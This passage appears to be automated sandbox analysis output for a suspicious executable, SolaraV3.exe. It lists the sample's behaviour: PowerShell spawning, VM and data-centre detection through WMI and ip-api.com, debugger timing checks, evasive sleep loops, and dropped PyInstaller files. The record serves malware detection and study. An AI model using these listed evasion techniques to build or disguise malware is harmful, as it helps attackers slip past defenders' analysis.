Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\getmac.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 2_2_00007FFB0B815731 rdtsc

2_2_00007FFB0B815731

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8015	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1366	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7779
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1625
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6689
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2824
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1348
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5447
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1321
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4059
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5225
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 877
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4076

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_queue.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\SolaraV3.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI28842\python310.dll	Jump to dropped file

Found evaded block containing many API calls

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Evaded block: after key decision

Found evasive API chain checking for process token information

Source: C:\Users\user\Desktop\SolaraV3.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\Desktop\SolaraV3.exe

API coverage: 4.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4296	Thread sleep count: 8015 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4296	Thread sleep count: 1366 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4456	Thread sleep count: 7779 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2256	Thread sleep count: 1625 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5944	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4908	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840	Thread sleep count: 6689 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2840	Thread sleep count: 2824 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6612	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4732	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7760	Thread sleep count: 1348 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7932	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6056	Thread sleep count: 5447 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4684	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608	Thread sleep count: 1321 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6076	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep count: 4059 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7940	Thread sleep count: 201 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636	Thread sleep count: 5225 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636	Thread sleep count: 877 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3540	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5448	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376	Thread sleep count: 4076 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7396	Thread sleep count: 284 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380	Thread sleep time: -2767011611056431s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC709280 FindFirstFileExW,FindClose,	1_2_00007FF6DC709280
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF6DC7083C0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC709280 FindFirstFileExW,FindClose,	2_2_00007FF6DC709280
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF6DC7083C0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81322E MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFB2AD9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,	2_2_00007FFB0B81322E
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE946EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	110_2_00007FF74EE946EC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED88E0 FindFirstFileExA,	110_2_00007FF74EED88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE8E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	110_2_00007FF74EE8E21C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
